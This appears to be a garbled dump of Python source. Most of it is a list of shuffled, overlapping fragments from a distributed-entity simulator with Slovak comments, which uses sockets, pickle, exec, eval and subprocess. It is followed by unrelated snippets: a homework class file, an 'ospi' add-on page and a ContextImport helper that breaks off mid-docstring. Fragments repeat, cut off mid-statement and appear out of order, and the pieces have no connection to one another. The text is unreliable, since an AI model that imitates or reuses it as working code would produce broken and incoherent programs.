prvý uzol správania príslušného pre aktuálny stav. _n =", "predať funkcii # exec() prostredníctvom tretieho argumenty atribút objektu __dict__, v ktorom #", "samotná správa. _logger.info(\"Entity: {0} | Action: SEND | Message : {1} | To", "%s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value): _expression = \"%s.append(%s)\" %", "na poziícii premenná # uložíme si do premennej _result hodnotu True. Ak sa", "run() identifikovať # správanie príslušné tomuto vzoru. return _pattern @support_arguments def send(_message, _recipients):", "_neighbours _self._impulse = False _self._read_lock = False _self._count_sent_messages = 0 _context = Context()", "0 _context = Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller = Poller()", "== POLLIN: # Správu prečítame a následne extrahujeme obsah správy a odosieľatela. _pickled_received_message", "stdout=PIPE, universal_newlines=True, shell=True) # cast to correct output type if _output_type == 'string':", "funkcií jazyka Python. Exec() dokáže vykonať # akýkolvek valídny Python príkaz. Príkaz, ktorý", "# správanie príslušné tomuto vzoru. return _pattern @support_arguments def send(_message, _recipients): # Vykonáme", "_process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value): _expression = \"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression))", "rovnakej pozícii vo vzore a # prijatej správe tá istá hodnota a vo", "1 # Pre každého prijímateľa vytvoríme nový soket typu DEALER [18]. Následne #", "_n = _self._states_behaviors[_current_state][_behavior].head _next_node = None # Iterujeme cez správanie. while _n is", "state : {1} | New state : {2} \".format(_self._id, _self._state, _new_state)) # Entita", "prijímateľov aby sme napríklad v prípade # argumentov, ktoré sú premennými dostali konkrétne", "hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not tuple: _message", "_result = [] # Porovnáme správu so vzorom. Ak je na rovnakej pozícii", "ValueError as _Value: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong value! -> {1}", "% _self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie", "= _state _self._term_states = _term_states _self._states_behaviors = _states_behaviors _self._neighbours = _neighbours _self._impulse =", "in _neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] = len def read(): # V nekonečnom", "New state : {2} \".format(_self._id, _self._state, _new_state)) # Entita zmení svoj stav na", "_Value, _completed_process.stdout)) exit() elif _output_type == 'float': try: _process_output = float(_completed_process.stdout) except ValueError", "_n in _recipients: try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content = (_message,", "_self._state # Entita sa spustí impulzom alebo začne čítať prijaté správy. if _self._impulse:", "= [_recipients] * 1 # Pre každého prijímateľa vytvoríme nový soket typu DEALER", "_self.__dict__) _logger.info(\"Entity: {0} | Action: ASSIGN | Expression : {1} \".format(_self._id, _expression)) except", "Príkaz, ktorý ma exec vykonať je definovaný # reťazcom _expression. Aby mala funkcia", "Následne # odošleme správu spolu s identifikátorom odosieľatela a zvýšíme počet # odoslaných", "| Wrong value for output cast to int! -> {1} -> {2} \".format(_self._id,", "return result @support_arguments def execute(_command, _output_type, _output, _input): _command = split(_command) _input =", "vzorom. Ak je na rovnakej pozícii vo vzore a # prijatej správe tá", "def run(_self): # Entita vykonáva správanie pokiaľ sa nedostane do terminujúceho stavu. while", "if _socks.get(_self._in_socket) == POLLIN: # Správu prečítame a následne extrahujeme obsah správy a", "príslušné tomuto vzoru. return _pattern @support_arguments def send(_message, _recipients): # Vykonáme evaluáciu správy", "if type(_message) is not tuple: _message = (_message, ) # Ak je prijímateľ", "send(_message, _recipients): # Vykonáme evaluáciu správy a prijímateľov aby sme napríklad v prípade", "import Thread from pickle import dumps, loads from logging import getLogger from soda.helpers", "# Pre každého prijímateľa vytvoríme nový soket typu DEALER [18]. Následne # odošleme", "_self._state in _self._term_states: exit() @support_arguments def assign(_expression): # Pre uskutočnenie priradenia do nejakej", "_self._ip = _ip _self._in_port = _in_port _self._state = _state _self._term_states = _term_states _self._states_behaviors", "jazyka Python. Exec() dokáže vykonať # akýkolvek valídny Python príkaz. Príkaz, ktorý ma", "ktorý ma exec vykonať je definovaný # reťazcom _expression. Aby mala funkcia exec()", "def read(): # V nekonečnom cykle sledujeme, či na soket prišla správa. while", "entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec vrátime vzor, ktorý sa zhodoval", "_self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného", "istá hodnota a vo vzore nieje na poziícii premenná # uložíme si do", "int: _recipients = [_recipients] * 1 # Pre každého prijímateľa vytvoríme nový soket", "for _pattern in list(filter(lambda _p: _p != 'IMPULSE', _self._states_behaviors[_self._state])): _result = [] #", "| Message : {1} | To entity : {2} \".format(_self._id, _message, _n)) _self._count_sent_messages", "\"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output): _expression = \"%s =", "evaluate, \"EXEC\": execute, \"ADD\": add, \"REMOVE\": remove, \"POP\": pop } def run(_self): #", "entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme prijatú správu so všetkými vzormi", "deepcopy _self.__dict__['LEN'] = len def read(): # V nekonečnom cykle sledujeme, či na", "| Old state : {1} | New state : {2} \".format(_self._id, _self._state, _new_state))", "log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result = None try: result =", "from threading import Thread from pickle import dumps, loads from logging import getLogger", "# Vykonáme logiku uzlu. Logika uzlov je opísaná # v podkapitole 4.2.3 Správanie.", "not tuple: _result.append(True) elif _i != _j and type(_i) is not tuple: _result.append(False)", "# ktorá je jednou zo vstavaných funkcií jazyka Python. Exec() dokáže vykonať #", "= [] # Porovnáme správu so vzorom. Ak je na rovnakej pozícii vo", "| Action: Started by IMPULSE \".format(_self._id)) else: _self._read_lock = True _behavior = _self._actions[\"READ\"]()", "pozícii premenná úložíme hodnotu False. Pre pozície # kde je vo vzore premenná", "_n)) @support_arguments def become(_new_state): _logger.info(\"Entity: {0} | Action: BECOME | Old state :", "s identifikátorom odosieľatela a zvýšíme počet # odoslaných správ pre entitu o 1.", "\"SEND\": send, \"BECOME\": become, \"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\":", "_id, _ip, _in_port, _state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id = _id _self._ip =", "Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity: {0} | Action: SEND | Trying to send", "not None: # Vykonáme logiku uzlu. Logika uzlov je opísaná # v podkapitole", "# sa zhoduje so vzorom. if False not in _result: # Pre pozície", "+ _j + \"'\" _expression = \"%s = %s\" % (_identifier, _j) #", "stav terminujúci tak ukončíme správanie. if _self._state in _self._term_states: exit() @support_arguments def assign(_expression):", "= _new_state # Ak je tento nový stav terminujúci tak ukončíme správanie. if", "všetkými vzormi READ konštrukcií pre # aktuálny stav. for _pattern in list(filter(lambda _p:", "z príslušnej # pozície v správe do tejto premennej. for _i, _j in", "správanie. if _self._state in _self._term_states: exit() @support_arguments def assign(_expression): # Pre uskutočnenie priradenia", "správu so všetkými vzormi READ konštrukcií pre # aktuálny stav. for _pattern in", "správou, ktorú sme # prijali aby sme mohli následne v metóde run() identifikovať", "= dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného poslania správy. Zaznamenaný je identifikátor #", "\"'\" _expression = \"%s = %s\" % (_identifier, _j) # Využijeme akciu entity", "__init__(_self, _id, _ip, _in_port, _state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id = _id _self._ip", "stav na nový. _self._state = _new_state # Ak je tento nový stav terminujúci", "Ak sa hodnoty nezhodujú # a vo vzore nie je na pozícii premenná", "_logger.info(\"Entity: {0} | Action: EVALUATE | Undefined identifier! -> {1} -> {2} \".format(_self._id,", "| Action: RECEIVED | Message : {1} | From entity : {2} \".format(_self._id,", "flags=DONTWAIT) # Zalogovanie úspešného poslania správy. Zaznamenaný je identifikátor # odosielateľa, prijímateľa a", "Wrong value! -> {1} -> {2} \".format(_self._id, _Value,_expression)) exit() return result @support_arguments def", "@support_arguments def execute(_command, _output_type, _output, _input): _command = split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output=", "_input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process = run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) #", "# Nakoniec vrátime vzor, ktorý sa zhodoval so správou, ktorú sme # prijali", "premennými dostali konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is", "impulzom alebo začne čítať prijaté správy. if _self._impulse: _self._impulse = False _behavior =", "_self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not tuple: _message = (_message, )", "svoj stav na nový. _self._state = _new_state # Ak je tento nový stav", "else: _self._read_lock = True _behavior = _self._actions[\"READ\"]() _self._read_lock = False # Nastavíme _n", "tak ukončíme správanie. if _self._state in _self._term_states: exit() @support_arguments def assign(_expression): # Pre", "_recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not tuple: _message = (_message, ) #", "typu DEALER [18]. Následne # odošleme správu spolu s identifikátorom odosieľatela a zvýšíme", "= False _self._count_sent_messages = 0 _context = Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" %", "každého prijímateľa vytvoríme nový soket typu DEALER [18]. Následne # odošleme správu spolu", "objektu __dict__, v ktorom # sú uchované všetky aktuálne referencie premenných a ich", "uzol správania príslušného pre aktuálny stav. _n = _self._states_behaviors[_current_state][_behavior].head _next_node = None #", "False _self._count_sent_messages = 0 _context = Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port)", "je prijímateľ iba jeden pretypujeme ho na pole. if type(_recipients) is int: _recipients", "{0} | Action: ASSIGN | Expression : {1} \".format(_self._id, _expression)) except NameError as", "Porovnámme prijatú správu so všetkými vzormi READ konštrukcií pre # aktuálny stav. for", "ActionNode: _next_node = _n.execute(_self) elif type(_n) is IfNode: _next_node = _n.execute(_self) if _next_node", "_self._neighbours = _neighbours _self._impulse = False _self._read_lock = False _self._count_sent_messages = 0 _context", "pre # aktuálny stav. for _pattern in list(filter(lambda _p: _p != 'IMPULSE', _self._states_behaviors[_self._state])):", "Pre pozície kde je vo vzore premenná uložíme hodnotu z príslušnej # pozície", "Porovnáme správu so vzorom. Ak je na rovnakej pozícii vo vzore a #", "subprocess import run, PIPE from shlex import split from copy import deepcopy _logger", "tuple: _message = (_message, ) # Ak je prijímateľ iba jeden pretypujeme ho", "} def run(_self): # Entita vykonáva správanie pokiaľ sa nedostane do terminujúceho stavu.", "{2} \".format(_self._id, _Value,_expression)) exit() return result @support_arguments def execute(_command, _output_type, _output, _input): _command", "_completed_process = run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) # cast to correct output type", "obsah správy a odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0}", "RECEIVED | Message : {1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id))", "správa. _logger.info(\"Entity: {0} | Action: SEND | Message : {1} | To entity", "\"'\" + _completed_process.stdout + \"'\" elif _output_type == 'int': try: _process_output = int(_completed_process.stdout)", "v správe do tejto premennej. for _i, _j in zip(_pattern[1], _received_message): if type(_i)", "vykonáva správanie pokiaľ sa nedostane do terminujúceho stavu. while _self._state not in _self._term_states:", "\"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\": add, \"REMOVE\": remove, \"POP\": pop } def run(_self):", "aby sme napríklad v prípade # argumentov, ktoré sú premennými dostali konkrétne hodnity.", "sme napríklad v prípade # argumentov, ktoré sú premennými dostali konkrétne hodnity. _message", "_self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not tuple: _message = (_message, ) # Ak je", "_context = Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller = Poller() _poller.register(_self._in_socket,", "ich hodnôt. try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0} | Action: ASSIGN | Expression", "nový stav terminujúci tak ukončíme správanie. if _self._state in _self._term_states: exit() @support_arguments def", "_self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\": read, \"SEND\": send, \"BECOME\": become, \"ASSIGN\": assign, \"LOG\":", "premenná úložíme hodnotu False. Pre pozície # kde je vo vzore premenná si", "vytvoríme nový soket typu DEALER [18]. Následne # odošleme správu spolu s identifikátorom", "# Využijeme akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela do použitelnej", "{0} | Action: RECEIVED | Message : {1} | From entity : {2}", "list(filter(lambda _p: _p != 'IMPULSE', _self._states_behaviors[_self._state])): _result = [] # Porovnáme správu so", "{1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme prijatú správu", "sa hodnoty nezhodujú # a vo vzore nie je na pozícii premenná úložíme", "odoslaných správ pre entitu o 1. for _n in _recipients: try: _out_socket =", "následne extrahujeme obsah správy a odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message)", "si do premennej _result hodnotu True. Ak sa hodnoty nezhodujú # a vo", "ktorú sme # prijali aby sme mohli následne v metóde run() identifikovať #", "Zalogovanie úspešného poslania správy. Zaznamenaný je identifikátor # odosielateľa, prijímateľa a samotná správa.", "| Action: SEND | Trying to send message to non existing neighbour! ->", "if _self._state in _self._term_states: exit() @support_arguments def assign(_expression): # Pre uskutočnenie priradenia do", "Exec() dokáže vykonať # akýkolvek valídny Python príkaz. Príkaz, ktorý ma exec vykonať", "_Attribute: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of identifier! -> {1}", "tuple: _result.append(True) elif _i != _j and type(_i) is not tuple: _result.append(False) else:", "Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except", "as _Type: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of identifier! ->", "type(_i) is tuple: _identifier, _ = _i if type(_j) is str: _j =", "argumentov, ktoré sú premennými dostali konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients))", "konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not tuple:", "ho na pole. if type(_recipients) is int: _recipients = [_recipients] * 1 #", "| New state : {2} \".format(_self._id, _self._state, _new_state)) # Entita zmení svoj stav", "_Attribute, _expression)) exit() except TypeError as _Type: _logger.info(\"Entity: {0} | Action: ASSIGN |", "| Wrong value for output cast to float! -> {1} -> {2} \".format(_self._id,", "uzlov je opísaná # v podkapitole 4.2.3 Správanie. if type(_n) is ActionNode: _next_node", "by IMPULSE \".format(_self._id)) else: _self._read_lock = True _behavior = _self._actions[\"READ\"]() _self._read_lock = False", "_expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong", "None try: result = eval(_expression, {}, _self.__dict__) except NameError as _Name: _logger.info(\"Entity: {0}", "na soket prišla správa. while True: _socks = dict(_poller.poll()) # Ak prišla správa.", "terminujúci tak ukončíme správanie. if _self._state in _self._term_states: exit() @support_arguments def assign(_expression): #", "EXEC | Wrong value for output cast to int! -> {1} -> {2}", "'IMPULSE', _self._states_behaviors[_self._state])): _result = [] # Porovnáme správu so vzorom. Ak je na", "nejakej premennej využívame funkciu exec(), # ktorá je jednou zo vstavaných funkcií jazyka", "# cast to correct output type if _output_type == 'string': _process_output = \"'\"", "= _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process = run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) # cast", "_self._impulse = False _self._read_lock = False _self._count_sent_messages = 0 _context = Context() _self._in_socket", "prvý uzol správania príslušného pre aktuálny stav. _n = _self._states_behaviors[_current_state][_behavior].head _next_node = None", "(_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output): _expression = \"%s = %s.pop()\" %", "= \"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output): _expression = \"%s", "POLLIN, DEALER from threading import Thread from pickle import dumps, loads from logging", "_self.i_ID = int(_id) _self.i_NEIGHBOURS = [_n for _n in _neighbours] _self.__dict__['deepcopy'] = deepcopy", "hodnota a vo vzore nieje na poziícii premenná # uložíme si do premennej", "of identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except TypeError as", "_states_behaviors, _neighbours): Thread.__init__(_self) _self._id = _id _self._ip = _ip _self._in_port = _in_port _self._state", "či na soket prišla správa. while True: _socks = dict(_poller.poll()) # Ak prišla", "if type(_recipients) is int: _recipients = [_recipients] * 1 # Pre každého prijímateľa", "import support_arguments from soda.distributed_environment.behavior import ActionNode, IfNode from subprocess import run, PIPE from", "so vzorom. if False not in _result: # Pre pozície kde je vo", "zmení svoj stav na nový. _self._state = _new_state # Ak je tento nový", "# V nekonečnom cykle sledujeme, či na soket prišla správa. while True: _socks", "{2} \".format(_self._id, _Value, _completed_process.stdout)) exit() elif _output_type == 'float': try: _process_output = float(_completed_process.stdout)", "využívame funkciu exec(), # ktorá je jednou zo vstavaných funkcií jazyka Python. Exec()", "Pre každého prijímateľa vytvoríme nový soket typu DEALER [18]. Následne # odošleme správu", "_expression. Aby mala funkcia exec() prístup ku všetkým lokálnym # premenným entity, ktoré", "# aktuálny stav. for _pattern in list(filter(lambda _p: _p != 'IMPULSE', _self._states_behaviors[_self._state])): _result", "# Entita vykonáva správanie pokiaľ sa nedostane do terminujúceho stavu. while _self._state not", "elif _i != _j and type(_i) is not tuple: _result.append(False) else: _result.append(None) #", "None: # Vykonáme logiku uzlu. Logika uzlov je opísaná # v podkapitole 4.2.3", "exit() return result @support_arguments def execute(_command, _output_type, _output, _input): _command = split(_command) _input", "spustí impulzom alebo začne čítať prijaté správy. if _self._impulse: _self._impulse = False _behavior", "_output_type, _output, _input): _command = split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process =", "Python. Exec() dokáže vykonať # akýkolvek valídny Python príkaz. Príkaz, ktorý ma exec", "ktoré používateľ opísal v algoritme je nutné predať funkcii # exec() prostredníctvom tretieho", "!= 'IMPULSE', _self._states_behaviors[_self._state])): _result = [] # Porovnáme správu so vzorom. Ak je", "| Action: EVALUATE | Wrong value! -> {1} -> {2} \".format(_self._id, _Value,_expression)) exit()", "_self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process = run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) # cast to", "čítať prijaté správy. if _self._impulse: _self._impulse = False _behavior = 'IMPULSE' _logger.info(\"Entity: {0}", "_logger.info(\"Entity: {0} | Action: Started by IMPULSE \".format(_self._id)) else: _self._read_lock = True _behavior", "== 'string': _process_output = \"'\" + _completed_process.stdout + \"'\" elif _output_type == 'int':", "_expression = \"%s = %s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\":", "správa # sa zhoduje so vzorom. if False not in _result: # Pre", "jednou zo vstavaných funkcií jazyka Python. Exec() dokáže vykonať # akýkolvek valídny Python", "exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type", "\".format(_self._id, _Attribute, _expression)) exit() except ValueError as _Value: _logger.info(\"Entity: {0} | Action: EVALUATE", "IMPULSE \".format(_self._id)) else: _self._read_lock = True _behavior = _self._actions[\"READ\"]() _self._read_lock = False #", "alebo začne čítať prijaté správy. if _self._impulse: _self._impulse = False _behavior = 'IMPULSE'", "_ip _self._in_port = _in_port _self._state = _state _self._term_states = _term_states _self._states_behaviors = _states_behaviors", "premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0} | Action: READ | Message : {1}", "správe tá istá hodnota a vo vzore nieje na poziícii premenná # uložíme", "uložíme hodnotu z príslušnej # pozície v správe do tejto premennej. for _i,", "Vykonáme evaluáciu správy a prijímateľov aby sme napríklad v prípade # argumentov, ktoré", ": {1} | To entity : {2} \".format(_self._id, _message, _n)) _self._count_sent_messages += 1", "aktuálny stav. _n = _self._states_behaviors[_current_state][_behavior].head _next_node = None # Iterujeme cez správanie. while", "if type(_n) is ActionNode: _next_node = _n.execute(_self) elif type(_n) is IfNode: _next_node =", "správy a odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0} |", "poziícii premenná # uložíme si do premennej _result hodnotu True. Ak sa hodnoty", "úspešného poslania správy. Zaznamenaný je identifikátor # odosielateľa, prijímateľa a samotná správa. _logger.info(\"Entity:", "value! -> {1} -> {2} \".format(_self._id, _Value,_expression)) exit() return result @support_arguments def execute(_command,", "{1} \".format(_self._id, _n)) @support_arguments def become(_new_state): _logger.info(\"Entity: {0} | Action: BECOME | Old", "_poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS = [_n for _n in _neighbours] _self.__dict__['deepcopy']", "-> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() elif _output_type == 'float': try: _process_output =" ]
[ "def God(): return[Man(), Woman()] class Human: pass class Man(Human): pass class Woman(Human): pass", "<filename>HW9/YuliiaKutsyk/task_9_3_adam_and_eve.py def God(): return[Man(), Woman()] class Human: pass class Man(Human): pass class Woman(Human):" ]
[ "'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add new functions and classes here ####", "'ospi_addon.custom_page_3']) #### add new functions and classes here #### ### Example custom class", "custom_page_1: \"\"\"Add description here\"\"\" def GET(self): custpg = '<!DOCTYPE html>\\n' #Insert Custom Code", "page urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3',", "### class custom_page_1: \"\"\"Add description here\"\"\" def GET(self): custpg = '<!DOCTYPE html>\\n' #Insert", "functions and classes here #### ### Example custom class ### class custom_page_1: \"\"\"Add", "classes here #### ### Example custom class ### class custom_page_1: \"\"\"Add description here\"\"\"", "'<!DOCTYPE html>\\n' #Insert Custom Code here. custpg += '<body>Hello form an ospi_addon program!</body>'", "#Insert Custom Code here. custpg += '<body>Hello form an ospi_addon program!</body>' return custpg", "import ospi #### Add any new page urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) #", "'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add new functions and classes here #### ### Example", "'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add new functions", "GET(self): custpg = '<!DOCTYPE html>\\n' #Insert Custom Code here. custpg += '<body>Hello form", "html>\\n' #Insert Custom Code here. custpg += '<body>Hello form an ospi_addon program!</body>' return", "ospi #### Add any new page urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example:", "= '<!DOCTYPE html>\\n' #Insert Custom Code here. custpg += '<body>Hello form an ospi_addon", "description here\"\"\" def GET(self): custpg = '<!DOCTYPE html>\\n' #Insert Custom Code here. custpg", "class custom_page_1: \"\"\"Add description here\"\"\" def GET(self): custpg = '<!DOCTYPE html>\\n' #Insert Custom", "Add any new page urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1',", "new functions and classes here #### ### Example custom class ### class custom_page_1:", "#### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add", "class ### class custom_page_1: \"\"\"Add description here\"\"\" def GET(self): custpg = '<!DOCTYPE html>\\n'", "<gh_stars>1-10 #!/usr/bin/python import ospi #### Add any new page urls here #### ospi.urls.extend(['/c1',", "#### Add any new page urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1',", "#### add new functions and classes here #### ### Example custom class ###", "Example custom class ### class custom_page_1: \"\"\"Add description here\"\"\" def GET(self): custpg =", "here\"\"\" def GET(self): custpg = '<!DOCTYPE html>\\n' #Insert Custom Code here. custpg +=", "### Example custom class ### class custom_page_1: \"\"\"Add description here\"\"\" def GET(self): custpg", "def GET(self): custpg = '<!DOCTYPE html>\\n' #Insert Custom Code here. custpg += '<body>Hello", "custom class ### class custom_page_1: \"\"\"Add description here\"\"\" def GET(self): custpg = '<!DOCTYPE", "here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) ####", "# example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add new functions and", "'/c3', 'ospi_addon.custom_page_3']) #### add new functions and classes here #### ### Example custom", "urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3'])", "ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add new", "#### ### Example custom class ### class custom_page_1: \"\"\"Add description here\"\"\" def GET(self):", "example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add new functions and classes", "'/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add new functions and classes here #### ###", "add new functions and classes here #### ### Example custom class ### class", "\"\"\"Add description here\"\"\" def GET(self): custpg = '<!DOCTYPE html>\\n' #Insert Custom Code here.", "new page urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2',", "here #### ### Example custom class ### class custom_page_1: \"\"\"Add description here\"\"\" def", "custpg = '<!DOCTYPE html>\\n' #Insert Custom Code here. custpg += '<body>Hello form an", "and classes here #### ### Example custom class ### class custom_page_1: \"\"\"Add description", "any new page urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1']) # example: (['/c1', 'ospi_addon.custom_page_1', '/c2',", "(['/c1', 'ospi_addon.custom_page_1', '/c2', 'ospi_addon.custom_page_2', '/c3', 'ospi_addon.custom_page_3']) #### add new functions and classes here", "#!/usr/bin/python import ospi #### Add any new page urls here #### ospi.urls.extend(['/c1', 'ospi_addon.custom_page_1'])" ]
[ "OrderedDict(((\"t\", tag), (\"c\", content))) # --------------------------- # Classes # --------------------------- class ContextImport: \"\"\"", ">>> with ContextImport('/path/dir/fi.py') as module: >>> # prepends '/path/dir' to sys.path >>> #", "--------------------------- # Functions # --------------------------- def check_type(value, oktypes): # This allows 'Space' instead", "if callable(value): value = value() if not isinstance(value, oktypes): tag = type(value).__name__ msg", "import sys import os.path as p from importlib import import_module # --------------------------- #", "Auxiliary functions that have no dependencies \"\"\" # --------------------------- # Imports # ---------------------------", "None \"\"\" def remove_py(s): return s[:-3] if s.endswith('.py') else s self.module = remove_py(p.basename(module))", "is None) and (module != p.basename(module)): extra_dir = p.dirname(module) self.extra_dir = extra_dir def", "if not isinstance(value, oktypes): tag = type(value).__name__ msg = 'received {} but expected", "def check_group(value, group): if value not in group: tag = type(value).__name__ msg =", "else: return value def encode_dict(tag, content): return OrderedDict(((\"t\", tag), (\"c\", content))) # ---------------------------", "(\"c\", content))) # --------------------------- # Classes # --------------------------- class ContextImport: \"\"\" Import module", "= import_module('fi') >>> module.main() >>> with ContextImport('dir.fi', '/path') as module: >>> # prepends", "# module = import_module('dir.fi') >>> module.main() \"\"\" def __init__(self, module, extra_dir=None): \"\"\" :param", "self.extra_dir is not None: sys.path.insert(0, self.extra_dir) return import_module(self.module) def __exit__(self, exc_type, exc_value, traceback):", "\"\"\" def __init__(self, module, extra_dir=None): \"\"\" :param module: str module spec for import", "'/path/dir' to sys.path >>> # module = import_module('fi') >>> module.main() >>> with ContextImport('dir.fi',", "<gh_stars>0 \"\"\" Auxiliary functions that have no dependencies \"\"\" # --------------------------- # Imports", "def __enter__(self): if self.extra_dir is not None: sys.path.insert(0, self.extra_dir) return import_module(self.module) def __exit__(self,", "return s[:-3] if s.endswith('.py') else s self.module = remove_py(p.basename(module)) if (extra_dir is None)", "\"\"\" def remove_py(s): return s[:-3] if s.endswith('.py') else s self.module = remove_py(p.basename(module)) if", "extra dir to sys.path and imports the module, Example: >>> # /path/dir/fi.py >>>", "ContextImport('/path/dir/fi.py') as module: >>> # prepends '/path/dir' to sys.path >>> # module =", "/path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as module: 